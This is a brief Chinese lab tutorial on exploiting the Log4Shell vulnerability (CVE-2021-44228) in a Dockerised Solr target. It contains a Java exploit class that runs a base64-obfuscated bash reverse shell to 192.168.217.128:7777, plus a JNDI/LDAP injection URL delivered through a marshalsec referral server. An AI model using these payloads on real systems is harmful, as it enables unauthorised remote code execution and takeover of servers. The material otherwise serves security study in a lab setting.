Log4j2-CVE-2021-44228

一、环境搭建

机器：kali Linux

Java：jdk8

python：python3.7.x

二、在docker里面搭建靶机环境

三、访问

四、构造payload

五、替换

将上面构造好的反弹shell语句替换

import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
     public Exploit(){
             try{
                 Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMjgvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}");
                                }catch(Exception e){
                                            e.printStackTrace();
                                             }
                }
         public static void main(String[] argv){
                         Exploit e = new Exploit();
                            }
}

将上面文件放进Exploit.java文件，在Windows用javac进行编译成Exploit.class,记得切换成 jdk8！

然后放进kali里面查看

六、开启恶意站点

用python在含有java.class开启http服务

访问一下，看看效果

七、用marshalsec-0.0.3-SNAPSHOT-all.jar插件开启LADP监听

八、开启监听端口

九、传入恶意参数

http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://192.168.217.128:1389/Exploit}

十、查看效果

如上图所示即反弹shell成功！

原文始发于微信公众号（黄公子学安全）：Log4j2-CVE-2021-44228